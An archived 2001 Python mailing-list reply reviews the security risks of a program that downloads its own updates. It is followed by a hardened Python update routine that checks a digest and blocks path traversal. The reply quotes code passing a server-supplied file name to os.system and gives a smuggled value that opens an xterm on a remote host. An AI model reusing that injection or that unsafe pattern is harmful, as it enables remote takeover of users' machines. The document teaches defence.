Checking for new version of a program

Andrew Dalke dalke at dalkescientific.com
Mon Aug 20 20:29:26 EDT 2001


Andrei Kulakov wrote:
>I made a little function that checks for a new version of a program and if
>there is a new version, asks the user if he wants it downloaded. Are there
>any gotchas here?

There are a few things to worry about, some technical and some social.

The social first.  There are people who don't like their software
going out into the world without their permission.  Sometimes it's
because they don't like others knowing when they're using code, or
that it implements a license check, or worry that it's being
used to transmit more than an update check, or just plain paranoia.

Sometimes it's for more practical reasons, like being on a dial-up-
on-demand line where the modem might kick in to connect.  And
that whole process could take a minute or more.  Trust me on this :(

You've got a way to disable it.  It's got a way to be disabled.
I ask that you make it clear in the README, INSTALL and documentation
that this exists and can be turned off.

Now for the more technical issues.  I'm not sure enough about urllib
and its interaction with proxies, so I won't answer your most
direct inquiry.  What I can say is that programs like this are
fraught with security problems.  Here are a few concerns I have:

  - how stable is your site?  If it goes down, the call to get
changes_url will fail and raise an exception.

  - will you trust whoever might have the domain after you?
After all, if people use your code when that happens then there's
a way for others to sneak in arbitrary code onto the client
machine.

  - I understand there are ways to spoof DNS

>            cy_fname = "cymbaline-%s.tar.gz" % __version__
>            cy_url = base_url + cy_fname
>            cy = urllib.urlopen(cy_url).read()
>            fname = os.path.expanduser("~/" + cy_fname)
>            f = open(fname, 'w')
>            f.write(cy)
>            f.close()

Suppose someone hacked your server.  It's good that you
enforce that the file begins with "cymbaline-" and ends with
".tar.gz" so it's almost impossible to overwrite some other
file, like .login.

However, you then do

>            os.system("tar zxvf %s " % fname)

This assumes GNU tar, since 'z' isn't a standard option.
More worrisome, fname contains an arbitrary string sent by
the server.  With the hacker-attacked-your-server scenario,
suppose the version string was changed to
  ;xterm -display remote.host:0"
Then the code would be downloaded to
    "~/cymbaline;xterm -display remote.host:0.tar.gz"
which is a perfectly valid file name.  But then
  os.system("tar zxvf "~/cymbaline;xterm -display remote.host:0.tar.gz")
gets called, which opens an xterm on the attacker's designated machine.
And of course it could do anything else it wanted besides running xterm.


>Comments appreciated,

Code that does automatic updating is very tricky.  There are too
many potential security holes in it.  The only way I've seen
it done that seems safe is with some sort of crypto signatures,
but even that has its own problems.  (Eg, is the secret key on the
machine accessible to the world?)

                    Andrew
                    dalke at dalkescientific.com
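The points Andrew raises above (a server-supplied version string reaching a shell command, an archive member overwriting a file like .login, and the need for some integrity check before the download is trusted) can be illustrated with a hardened counterpart of the quoted update routine. The following is an added example written for this page; it is neither Andrei's code nor Andrew's, and it assumes a dotted-number version scheme for cymbaline, a pre-built tarball in memory standing in for the download, and a SHA-256 digest standing in for the signature check the reply mentions. No shell is invoked at all: the archive is unpacked with tarfile, each member is checked to stay inside the destination directory, and the version string is rejected unless it matches a strict pattern.

```python
"""Hardened version of an auto-update step (added example, not from the thread).

Assumptions (constructed for this example):
  - cymbaline releases are numbered like "1.2" or "1.2.3";
  - the caller already has the archive bytes and an expected SHA-256 digest
    obtained from somewhere it trusts independently of the download server.
"""
import hashlib
import hmac
import io
import os
import re
import tarfile
import tempfile

# Only a plain dotted number is accepted before it is used in a file name.
# A string such as  ;xterm -display remote.host:0"  fails this test.
VERSION_RE = re.compile(r"\d+(\.\d+){0,2}")


def is_safe_version(version):
    """True only if the server-supplied version string is a plain dotted number."""
    return VERSION_RE.fullmatch(version) is not None


def release_filename(version):
    """Build the archive name, refusing anything that is not a clean version."""
    if not is_safe_version(version):
        raise ValueError("refusing server-supplied version %r" % (version,))
    return "cymbaline-%s.tar.gz" % version


def verify_digest(data, expected_sha256):
    """Constant-time comparison of the archive digest against the trusted value."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_sha256)


def safe_members(tar, dest):
    """Yield only regular files/directories that extract inside dest.

    Absolute paths, '..' components and symlinks/devices are all rejected, so an
    archive cannot overwrite something like ~/.login.
    """
    dest_real = os.path.realpath(dest)
    for member in tar.getmembers():
        if not (member.isfile() or member.isdir()):
            raise ValueError("refusing non-regular member %r" % member.name)
        target = os.path.realpath(os.path.join(dest_real, member.name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            raise ValueError("member %r escapes %s" % (member.name, dest))
        yield member


def install_release(archive_bytes, expected_sha256, dest):
    """Verify the digest, then extract with tarfile (no shell, no os.system)."""
    if not verify_digest(archive_bytes, expected_sha256):
        raise ValueError("digest mismatch: archive rejected")
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        members = list(safe_members(tar, dest))
        # Newer Pythons also ship a built-in 'data' filter; use it when present.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **extra)
    return sorted(m.name for m in members)


def build_archive(files):
    """Constructed stand-in for the downloaded tarball: {name: bytes} -> .tar.gz bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def demo():
    """Constructed end-to-end run: a clean archive installs, a traversal archive
    and a tampered archive are both refused."""
    good = build_archive({"cymbaline/README": b"hello\n"})
    bad = build_archive({"../.login": b"not yours\n"})
    with tempfile.TemporaryDirectory() as dest:
        installed = install_release(good, hashlib.sha256(good).hexdigest(), dest)
        try:
            install_release(bad, hashlib.sha256(bad).hexdigest(), dest)
            traversal_rejected = False
        except ValueError:
            traversal_rejected = True
        try:
            install_release(good, "0" * 64, dest)
            digest_rejected = False
        except ValueError:
            digest_rejected = True
    return installed, traversal_rejected, digest_rejected


if __name__ == "__main__":
    print(release_filename("1.2.3"))
    print(demo())
```

The digest check only helps if the expected value reaches the client through a channel the download server cannot alter (shipped with the program, or obtained from a separately trusted source); a digest fetched from the same compromised host proves nothing. A public-key signature in place of the digest addresses the worry in the reply about a secret on the client machine, since only the public key needs to be present there and the signing key stays with the publisher.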
